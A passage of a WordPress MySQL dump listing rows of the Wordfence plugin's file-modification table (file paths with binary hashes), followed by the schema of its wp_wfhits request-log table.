�\'�','',0,'?'),('���S�K5�47��S','wp-includes/css/dist/block-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';`��[\"���E-�{�Ψ','&�+�$�K��3��&-������>Sd�Ă�M�r','',0,'?'),('��w0�=_b��&��Oc�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',0,'�G��5]{\"���V�','�G��5]{\"���V�','�C�Jr~W�OY�*[�:[j)���G�Є�e�','',0,'?'),('�����+f6Q�y9','wp-includes/js/jquery/ui/selectmenu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�&H_ǭGv�P-','���!�V�&G7�E>�ڋ.��X[���t','',0,'?'),('��ρX�n\r��?��','wp-includes/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��Ʈ�u��o7;~z','����� %l�y�\'�#[���_�{E�]8�%�','',0,'?'),('���VY�7�z��a]E\Z','wp-includes/wp-includes/ms-site.php',0,'�ظ;�#�t��r�/+0','�ظ;�#�t��r�/+0','J�c�CBE�䱢?$Gq�u,7��ޚ�A�','',0,'?'),('����?i.Q�[��E�','wp-includes/blocks/post-navigation-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9t%�	\nl$*�<�.�','P�D�W3�ڧ��聻P�o�ZBe�7UJM','',0,'?'),('�}�\Zcʶ����;','wp-content/plugins/wordpress-seo/src/integrations/admin/menu-badge-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �\r�N-\n=2\'�-rXG','�΂�/%z\'4\'�4�/�~@sƸS\'��S)','',0,'?'),('�])��	���{�?R}','wp-includes/feed-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iJ�?YC�>^��f�','�fl�P��f5�2tY3�x���D��ׄ�','',0,'?'),('�%~o�.A���0GU','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more-2x.png',0,'l,��r�%�^x�%','l,��r�%�^x�%','���Y=�_�b��|ʧ&f,��<�������','',0,'?'),('�-TUϑ�jk1hlDz�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-spam-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�vX�,*�gs?R','�:�v��m��ҧ�����Ǿ���r=\\U�&�','',0,'?'),('�0<Ps��מH��22','wp-includes/js/jquery/jquery.table-hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7?�F5�sS5�7��,(','J<��?Y������SuŪ�U&�\nNy�`TkL�','',0,'?'),('�9(F�Rj2�n6]��','wp-admin/css/colors/light/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z5�\Zk�p��Ĥ�OF��','�&_d쇽ɭ��\Z\08-X���#�E_=�Q�G�','',0,'?'),('�?P���q��%�]2\"','wp-includes/wp-includes/ms-deprecated.php',0,'������K��Mý','������K��Mý','��{�\"�z�GW1ɓDĝ��U�͏�[���','',0,'?'),('�J���!2���\0����','wp-admin/css/about.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�G������<�*','L��`2�~�L���B��wU�/o��b�8��','',0,'?'),('�^��N4ӝ,ba��D','wp-includes/css/dist/widgets/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X\n�g3�.%~�i�;���','ST�G���[~hF�:R`gsDb���PQ�\0\"�@�','',0,'?'),('�^�O�|\':QǙE���','wp-content/plugins/wordfence/views/common/status-critical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�/C[���]�u%�','�W���B&6�9�g�k_����EF�6�I','',0,'?'),('�g�\"�}_�7����J5','wp-includes/js/jcrop/jquery.Jcrop.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}���(�/�WM','�r�NR�n��ɳ�0�1\Z�6��[�՛�	�','',0,'?'),('�o�5�+���I���JP','wp-admin/site-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dqGd�C�#���','��jMlhk�_P�0pv�oyN�[R�-$g�a2','',0,'?'),('�v6Z�\'�O�IL\"ݕM�','wp-includes/js/dist/block-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w\"����,�!f�m/�','��k�\"t�#Z�#-;ݟs�ӎ*���j�\r8PX','',0,'?'),('��p��9�6è�R�','wp-admin/css/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�8/%I����7��','���%�w���]G5{\'��w�v�H>�͜��Hk','',0,'?'),('����i�O�%1-��','wp-content/plugins/redirection/database/schema/420.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�ϙ�����[�qs�','D;$�En�H(o�2,�\0F@`RgC�lԓ�ȕ�','',0,'?'),('��w����1�\"���;O','wp-content/plugins/wp-cerber/assets/flags/ls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�u�V(�j��~`','^;F�Ne�R\0�p���;?ڿ�)�V6�];�','',0,'?'),('�����ƪq�悳��','wp-includes/js/tinymce/plugins/paste/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���s׶�{��މ2','�\Z�X8�c+�x�η����&Wg�`m�˴','',0,'?'),('��lxy�\Z����\"��','wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EU.7����H>i��;�','��,��+x>��� V���7r�LKs&��G�','',0,'?'),('���~#Q�I���','wp-includes/wp-includes/js/thickbox/thickbox.js',0,'��|}�\Zc�%��9j��','��|}�\Zc�%��9j��','��b?/a#�׼�h�l��������\rk���','',0,'?'),('����u��qm�Ƈ','wp-content/plugins/wp-cerber/assets/fonts/cerber.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���.XG�����','�V�n;����D�vFz,�Tk�U�.�,ub\Z�','',0,'?'),('���q�L��>��#Q�\0','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B���gY��','���:�IZ��C��Z��8�Ȱ�L��]�m�','',0,'?'),('��<l�a��,�bX,��','wp-admin/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('�Ș�SQH1�M�����','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����M�Ԙ�uu�c','y�\Z�i���Xqqک�v+�H*�N&Y��6�C_�','',0,'?'),('�њ�K4lzR��^*','wp-content/plugins/all-in-one-wp-security-and-firewall/vendor/composer/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0��ڿ�,gH$','h��ي<�=��)6�B�0���fk�p�K�e<','',0,'?'),('�ٯ��e>��ƫI���','wp-includes/wp-includes/theme.php',0,'W]��(DR{��.','W]��(DR{��.','Xe[	�4\0����\",����d��ځ��#�','',0,'?'),('��h�.��H�ʸ��','wp-content/themes/hitmag/inc/kirki/modules/css-vars/class-kirki-modules-css-vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�>A҈�i0M�','wC��^+ÂO�.�/���3:|�׷�S�','',0,'?'),('����K(����y�','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',0,'��7֊i[L�9ƁH	�','��7֊i[L�9ƁH	�','߹{8(��Ïat��\0C�n3Q�ڤ\n�l?�$y�','',0,'?'),('����	�JX����','wp-includes/wp-includes/js/jquery/ui/effect-puff.js',0,'��CH��w�d���֞','��CH��w�d���֞','s� LMÖ�,sK���\Z~Q#�.0W�N׳_~','',0,'?'),('�+q^e����gu�F6\n','wp-includes/theme-compat/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ţs�^��q�cb�','W���5T�p��;-�n��0�a����O\n��','',0,'?'),('�2����=Ej˜�h\n','wp-content/plugins/wordpress-seo/src/integrations/front-end/indexing-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��E3�b&b�q��\0�','1��8�t;2�!q�ի3%f!zvm@�˘�\"�A','',0,'?'),('�G���!#h�9	��&','wp-includes/js/tinymce/plugins/wordpress/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^H��\"���If�f\n','�ژ��Z�9P�MS�dh��f�(�-��tU�f�','',0,'?'),('�J�¦1�f�%��','wp-includes/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php',0,'�h�Co�;�,.!O^�>','�h�Co�;�,.!O^�>','Otu��%~�x�ʱ��o��ӗJ���4��%�','',0,'?'),('�Kj��h���','wp-content/plugins/wordfence/images/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('�P���:��v���Qw','wp-includes/blocks/list/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɢ���\'8	\\��}��','U-�W�u����\0g\0���cuǒF�ua\00\nU','',0,'?'),('�`Sk��7Tt�v��X�','wp-includes/class-wp-list-util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|�K�d��J�\"r��ZM','a��{�\\q\n%iz�J%.R�k���[{�?�','',0,'?'),('�la\'�P_b�m	!���p','wp-includes/blocks/audio/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�X��:)I!�?z','��ґ�@�?q�,֙��V��b�is','',0,'?'),('�us�T­B��B','wp-content/plugins/wordfence/images/sort_desc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J%{O�Z\"/�o','^*�n^�\0m+��!Nk�Ɍ��/��ԯ^k','',0,'?'),('���ZL��O�l��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��F�h�z','oő\nw�n��pL�+;����~��t2�P*ƃ6�','',0,'?'),('��@͸`G�A���+=\'','wp-content/plugins/wp-cerber/assets/flags/ss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0,�mFD\0gr�n���z','���:_�T�/�<F�#���9��dڒ��\Z�\n','',0,'?'),('���\'�B���7S�','wp-includes/js/zxcvbn-async.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�$a�[ZF)^\n��~','�uQ9ҫ{��7o}�����`�-nW�','',0,'?'),('��{�	\n|p�٤','wp-includes/customize/class-wp-customize-nav-menu-item-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:��i��X�.3�b','.	��Z�ȝ�]a��`iS��ac@�9���T{�9','',0,'?'),('�����)�(��<��','wp-includes/js/json2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��\'X$�p��qv','v��T/��ů�D�i\Z\\y�q-B�=��k8���i','',0,'?'),('��b#!A�3XV�4	�','wp-includes/blocks/comments-pagination/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J1\'q�}ը��\Z�','��}_0[j\r�s��?�LO-�z�l�T�p����','',0,'?'),('��vhy2��%��(��)','wp-includes/blocks/code/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�	m�����E�J��','�w(�$���썎�B.���}�e�-���','',0,'?'),('��#%�s�b�Nv@','wp-content/plugins/wp-cerber/assets/flags/do.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3���CϿ�','=�gBl�F��6h�llwhdc�;@t�!�s','',0,'?'),('�Ɛ�O�|A�7�;o�','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Exception/RuntimeException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{A��sN�f�','��/k�\'��F��yߙ��;F�@�$pdsz��','',0,'?'),('���!|MWk��pr�','wp-includes/blocks/query/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���f\Z����E�g3','}0Tqo\']�+gW��Q+�l|]O��2Yi�m$�','',0,'?'),('��a��\'@T瑓����','wp-admin/images/date-button.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v!0ϝ$�\n-潮L��T','h�ŵδ䘼��n$����������q!I#�','',0,'?'),('���`��I��B3����','wp-content/themes/hitmag/inc/kirki/modules/custom-sections/class-kirki-modules-custom-sections.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��{Cb�A�DNX�?*�','�P�l���I:���Bw�<�@.$#�@','',0,'?'),('��x�Q�}�\0\n�|W�W�','wp-content/plugins/wordpress-seo/src/actions/importing/deactivate-conflicting-plugins-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k;@��`5h��Ht�','����%�������i�7U3|�����t4.�3','',0,'?'),('����n�oG1��|*','wp-includes/wp-includes/class.wp-styles.php',0,'�U���vz��4�<q\Z�','�U���vz��4�<q\Z�','���/U��V�tD��b}��F�9S��z���','',0,'?'),('�<��o\\]v�VT��','wp-content/plugins/wp-cerber/assets/flags/sh.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AX�[\\\'�18�nV �','��V�xĔ�@-ٙ��?�f���ґR(|���4','',0,'?'),('�낏\r?8[9�kQ\'s','wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!7�r��ey�s�\Z','@�}�\n�y.\'w�,�5�e\"FE�Yb�v@�.','',0,'?'),('�\'T����́��Y�Ǚ','wp-includes/customize/class-wp-customize-cropped-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�p[�q}y��1�','�x\r:����}��gR)�`�����k�M%','',0,'?'),('�����)z]!?��a�','wp-admin/images/media-button-video.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>���u��e�w�J','Y�e���\"n+�#@���Ƽ�Z���g�VP��\'','',0,'?'),('�%|ݽ�>?v{j��','wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��=�l���	2�X��','״�0���M\"��r,_�Ǝ>)G�����wg?','',0,'?'),('�/e\n��o�?}m�bK','wp-includes/blocks/page-list/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?^j*j�t�`���','#�۸J9��ý1��P\"��-�ix\n\ZY<X�','',0,'?'),('�2�}�+�x4f��	m�X','wp-content/plugins/wordpress-seo/admin/pages/dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�jK��-����h','���Q��uv��&\Zn	r�R�j̽���(��','',0,'?'),('�>�:U�~PGtx^an','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-multicolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�b�#���͚u]}','��&ђҷ�hI���G��a��K����>�S�s݉','',0,'?'),('�F�%��C��0����,','wp-admin/css/list-tables-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(h�T�G�u��GMZ%<','̺8����0QR#\r�ٙb�\ZѬ�WT:��','',0,'?'),('�I\"�p��t�Q��[Z6x','wp-includes/css/admin-bar.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�Z�� c��%','�&}8P�T��f�/a;\r��}[�p<.���á','',0,'?'),('�KXـ����2#z�','wp-includes/blocks/comments-title/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�|�v�ʡ����,�T','	[�W��N&��a��-�(��C�E��\0�P','',0,'?'),('�L�oA7��ev	','wp-includes/blocks/loginout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ��aG*qc:�B{','�K��r�M��m8n�JK���>�`��A�܅��j�','',0,'?'),('�ZV�Z@�Z�9�d8','wp-content/plugins/wp-cerber/assets/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�&��QI\0��2w','�@c��ŀE�|�(j_�ϤJ���<^�iv�޶v','',0,'?'),('�`5s[kr-j�e�W','wp-content/plugins/wp-cerber/assets/flags/az.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j+I��Y���.d','YmZ\n�Ġjk�^�1`�1�5$mƳ`�}Gi\Z�','',0,'?'),('�c��wk�(���4�3�','wp-admin/includes/list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yݣz�\0�p�or	','ָ�\'�K`:���$����$b��}$\'�2�','',0,'?'),('�gV���HIw��!���','wp-includes/css/customize-preview.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1ig`��o���ӏٷ1>','�>kdU���������=@R���\r����;�','',0,'?'),('�gdٸ��`�6�O�7','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/CancellationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^H�Ng����jk?���','�f9@�|����ewX�q˸�jx���cǰRG�_Z','',0,'?'),('�y.{�uJߠ5�[�\Z.','wp-includes/blocks/more/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�ꦗ+�H)�6��','�-d7������v[p�ν��Pk4ݍ��s\"','',0,'?'),('�}��A��5� PԆ��','wp-includes/blocks/gallery/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׈\r�2S[L���W�?�R','G`�	�#C��Ab#g��*j��{d��\\ۗ','',0,'?'),('�Qֿ6��yq�88','wp-includes/theme-compat/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�8��y̻�@�B�5','][����ۭ�}�ߟv{�c�vҧ{P��K1~��','',0,'?'),('��+S�S�=o�)��I�','wp-content/plugins/wp-cerber/assets/magnific/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a3HWX\0\'A�l&�','DQ�Z7ӳ\r�[�G���#q�#W14��W��f','',0,'?'),('���y�B�diu�^�','wp-includes/wp-includes/sodium_compat/lib/constants.php',0,'����{�#��l�>m','����{�#��l�>m','��ٹmc(�l��\'�mt�ˣ�[��g��W','',0,'?'),('����KJV�Y��[]','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�/g��%�k5o+9','�\Z7���zݯ0�D���aX^RښH�I+��o�','',0,'?'),('��j_�G�o�pza','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-deactivation-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8!q��ᑂ�a\r','m��ҟ�2a-ᐐ;x\'+xv6n�xS	Ќ��','',0,'?'),('��������D��','wp-content/plugins/wordpress-seo/src/integrations/front-end/category-term-description.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*U�>��N�T�',']�3�:��?�!F��_m�4�W���ϟ[','',0,'?'),('����d�j8�\Z ��\"','wp-includes/wp-includes/css/jquery-ui-dialog-rtl.css',0,'xs!�����U,U���','xs!�����U,U���','�Y� 4�0���@��>Wb�5!4����','',0,'?'),('�šͪ(���av�^�','wp-content/plugins/redirection/api/api-group.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q���z5}(����','�K�����=(���|(��͗�k�Aie�;7�','',0,'?'),('��rA|Ƌ��d�O쨰','wp-includes/blocks/image/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����N��$	','D��F7�;��50Z��9���j��ٛ��K	','',0,'?'),('����PwA�W�(�0','wp-content/plugins/wp-smushit/core/integrations/class-gutenberg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�U��\n�f�z˟e@','Qm`���r�\\�\'_IA%ʵ�\\��e��]\'','',0,'?'),('��_7�8r�>�z�`','wp-includes/wp-includes/js/dist/primitives.js',0,'���-�v��t��(4V','���-�v��t��(4V','���a��_��Lx�c$��tU�v�����%��','',0,'?'),('��XUug�\0����V��#','wp-content/plugins/wp-smushit/app/pages/class-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�h�{n�$1q��cBJ5','�:�g�C@�X7�y�hU�F�~NQW�;|��n','',0,'?'),('���w��\'�6)','wp-includes/rss-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' xr�6�2�\'�]�e�l#','�~^Ɏf}n���Bh��i=F�\n�	��^�,','',0,'?'),('��x�R���+@:D���','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ms.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C\rI`\"7v`8���;]','���T4������п�=��I�JmE16L}�','',0,'?'),('����N��9�{�;','wp-includes/js/mediaelement/wp-mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',m;V*H��Tt���~X�','��a�ԋRY哝���a����<�n[G{=y3�? ','',0,'?'),('��Q����k��iG','wp-content/plugins/wp-smushit/app/class-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӿT�Ô�`Q��\"�R','Y�#��u�&��B�-�~h�;�]�U@����.','',0,'?'),('��.���I�\nfq�M9','wp-includes/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�i��L�V=X+�	v0~','4��-<4�,\"V�ȱXʘî�hR�	K�F�k�','',0,'?'),('� �~a;=�O�.�m','wp-content/plugins/wp-fastest-cache/templates/cdn/file_types.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/3�;H.���\r�','r��\nn���p\0�\0�n��{<���f��-�','',0,'?'),('�\"U�F~B�.��S','wp-includes/blocks/video/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r��k*�_��t��','ʱO��!x#�-@�mF��B��X�ƻ�%�-','',0,'?'),('�$��OA����sL\'','wp-includes/wp-includes/js/hoverintent-js.min.js',0,' p��.`�u76��?',' p��.`�u76��?','Y!�:\nA��ː	��ګ�Zg�,=�|����','',0,'?'),('�0o�G��0�yjf_','wp-content/plugins/wp-smushit/_src/scss/modules/_cdn.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0����4���g���','�ݴ˓j#\r�\"?���b��~��Wχ,,=��a','',0,'?'),('�;`�$r���$���=','wp-content/plugins/wordfence/images/icons/warning128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�G�I�t*����Np=','����*�/���Ⱦs��t�A����}.b\'\\','',0,'?'),('�A��a�K�o���+O','wp-includes/blocks/post-author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��Ɨ�[�2�\ZEii','��bOSs�L*X�2ݲ%�$�|�y���<����','',0,'?'),('�E58��y���Ws�O��','wp-admin/css/admin-menu.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���э��U��ϝLJ��','��э���g�5�\'��-q;�s��4�G�~','',0,'?'),('�L�%�Sz����6$S�','wp-content/themes/hitmag/inc/kirki/assets/images/kirki-bottom.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x*QX�WTe���8�','�cA(Ϲ��0��\ZQ\n/���B�9��B���c','',0,'?'),('�L����e5x?e=�&','wp-includes/js/plupload/wp-plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)��5*�(�j���$Y',';�}�&:���2��Ԛ�mQ׈9{�!�b�\r\"`','',0,'?'),('�QS�2�#��]�srt�','wp-includes/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','⃎�w�l�\0�pA','�+��1,�3-�OETo��d��Û՚c�?�<�','',0,'?'),('�V&�[��i�x����','wp-includes/wp-includes/class-wp-feed-cache-transient.php',0,'�x��?^>��O�','�x��?^>��O�',':��;h�!xE�z��P+�dV�0����D�','',0,'?'),('�f�nV<���2qð','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php',0,'�=��p�5%�h$�*�','�=��p�5%�h$�*�','s�B`]��b��p�M���0�\\�s�w�D{����','',0,'?'),('�k����PP��1<�','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ou�l��_�4@��','6b% �\"�ʴs�J�p3����8ӷ�SǙ:����','',0,'?'),('����S���ڃ3�b�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/hy.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~E��8��?�?c��','���w\\h�����OC�S{���DY�T���o,�','',0,'?'),('��HF)\\�,�b�','wp-includes/js/jquery/ui/controlgroup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9��Q�8��o5�j','����Y<�C��*\'\\(6��N�r����ЛR�','',0,'?'),('��~%B�\0�z���?o','wp-includes/IXR/class-IXR-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�/�z�*�zͷ�;','lG\'��r5���+�̔Mh�Shq>��	\0Ϧ','',0,'?'),('��a5[4�5�Me�pC','wp-includes/js/jquery/ui/effect-bounce.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���uJ}��z.�WUy','������.�b�Mm!@��6$a|�m�8}A�','',0,'?'),('��S�CRC��l��','wp-admin/css/colors/sunrise/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����$lY��F��R�','k��v�Y�߁�R��TR��N*!�:�aH','',0,'?'),('���߹u7���[)�h','wp-includes/blocks/embed/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#���V����?�','�\\���g��v�j�T���(Z��%�~Rh���','',0,'?'),('���k��i��.���\\��','wp-includes/images/smilies/icon_neutral.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��VM3HU1!�v','���Ois8\0�|z��6�]e��@Y�m49','',0,'?'),('��1�N7��,�AW','wp-content/plugins/wp-smushit/_src/js/modules/onboarding.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� _�>N��]�@��','�~2a�c�X\"���33�y�-8Ã�5	>{A�','',0,'?'),('��4�5��q-��p,��','wp-includes/blocks/file/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g8�:��b��F��M/','�d�m���i�o�_1�HF��R/���l�(�I�','',0,'?'),('��©6��<��\09ZiR','wp-includes/js/jquery/ui/effect-fade.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����7V��7A=B;�','l0uV{����������gf�w`XJ6����','',0,'?'),('���@~}c���Q�\'��J','wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�9��;%��mM6Z','6�-�2�Xjݒ[�l��ÆL	\'8FJ','',0,'?'),('����.0T����','wp-content/plugins/wp-cerber/assets/flags/ec.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wX���h{�tJ�\r ','TYy��B5\'�#eܻ�!��7���=��Us�B&','',0,'?');
/*!40000 ALTER TABLE `wp_wffilemods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfhits`
--

DROP TABLE IF EXISTS `wp_wfhits`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhits` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `attackLogTime` double(17,6) unsigned NOT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `jsRun` tinyint(4) DEFAULT 0,
  `statusCode` int(11) NOT NULL DEFAULT 200,
  `isGoogle` tinyint(4) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `newVisit` tinyint(3) unsigned NOT NULL,
  `URL` text DEFAULT NULL,
  `referer` text DEFAULT NULL,
  `UA` text DEFAULT NULL,
  `action` varchar(64) NOT NULL DEFAULT '',
  `actionDescription` text DEFAULT NULL,
  `actionData` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`IP`,`ctime`),
  KEY `attackLogTime` (`attackLogTime`)
) ENGINE=InnoDB AUTO_INCREMENT=12644 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfhits`
--

LOCK TABLES `wp_wfhits` WRITE;
/*!40000 ALTER TABLE `wp_wfhits` DISABLE KEYS */;
